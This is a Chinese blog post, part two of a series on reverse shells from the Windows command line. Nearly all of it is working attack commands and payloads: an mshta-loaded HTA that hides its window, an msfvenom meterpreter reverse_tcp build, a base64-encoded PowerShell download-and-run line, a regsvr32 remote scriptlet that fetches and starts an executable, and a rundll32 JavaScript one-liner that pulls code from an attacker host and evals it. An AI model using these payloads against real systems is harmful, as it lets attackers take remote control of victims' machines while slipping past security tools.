windows命令行反弹shell(二)
2019-12-13 本文已影响0人
CSeroad
mshta命令
运行命令
mshta http://47.94.80.xxx/payload.hta
payload.hta 源码为
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "shellcode" //可以是exe、powershell
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
shellcode为msf生成。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.94.80.xxx LPORT=8080 -f exe > test.exe
这里将木马改为powershell,且经过base64编码后的脚本
$fileContent = "(new-object System.Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/test.exe','D:\a.exe');start-process 'D:\a.exe'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
使用-enc再进行解码执行
powershell -enc $encoded
可反弹shell。
image.png
regsvr32命令
regsvr32 /u /s /i:http://47.94.80.xxx/down.sct scrobj.dll
down.sct源码为
<?XML version="1.0"?>
<scriptlet>
<registration
description="Test"
progid="Test"
version="1.00"
classid="{10001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("powershell (new-object System.Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/test.exe','D:\\a.exe');start-process 'D:\\a.exe'",0,true);
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
运行后可反弹shell。
image.png
rundll32命令
这里推荐MyJSRat
https://github.com/Ridter/MyJSRat
下载后运行
python MyJSRat.py -i 144.34.184.xxx -p 8080
image.png
访问 Client Command
cmd运行
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://144.34.184.2xx:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
即可获得shell。
image.png
又水了一篇。
